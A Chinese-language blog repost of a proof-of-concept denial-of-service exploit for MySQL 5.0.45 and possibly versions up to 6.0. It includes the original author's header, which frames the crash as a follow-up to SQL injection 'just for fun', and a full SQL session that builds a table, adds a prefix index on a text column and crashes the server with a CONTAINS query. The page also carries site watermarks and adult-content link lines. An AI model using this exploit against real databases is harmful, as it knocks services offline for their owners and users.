mysql 5.0.45 (修改)拒绝服务漏洞

很文博客hinwi.com 数据库评论482字数 773阅读模式
广告也精彩

mysql 5.0.45 (修改)拒绝服务漏洞的方法,追求安全的朋友可以参考下。
mysql 5.0.45 (修改)拒绝服务漏洞
/*
* MySQL <=6.0 possibly affected
* Kristian Erik Hermansen
* Credit: Joe Gallo
* You must have Alter permissions to exploit this bug!
* Scenario: You found SQL injection, but you want to punch backend server
* in the nuts just for fun. Start with the Alter TABLE statement on
* a table and field you know to exist. The first two SQL statements are
* simply to demostrate reproducibility...
*/

mysql> Create TABLE `test` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
`foo` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
Query OK, 0 rows affected文章源自很文博客https://www.hinwi.com/很文博客-https://www.hinwi.com/41585.html

mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
Empty set文章源自很文博客https://www.hinwi.com/很文博客-https://www.hinwi.com/41585.html

mysql> Alter TABLE test ADD INDEX (foo(100));
Query OK, 0 rows affected
Records: 0 Duplicates: 0 Warnings: 0文章源自很文博客https://www.hinwi.com/很文博客-https://www.hinwi.com/41585.html

mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
ERROR 2013 : Lost connection to MySQL server during query文章源自很文博客https://www.hinwi.com/很文博客-https://www.hinwi.com/41585.html 文章源自很文博客https://www.hinwi.com/很文博客-https://www.hinwi.com/41585.html

工具:作品在线观看

女优:最新作品观看

中文:国语在线观看

weinxin
我的微信
扫一扫更精彩
大家的支持是我更新的动力!!!
 
广告也精彩
匿名

发表评论

匿名网友
:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen:
确定

拖动滑块以完成验证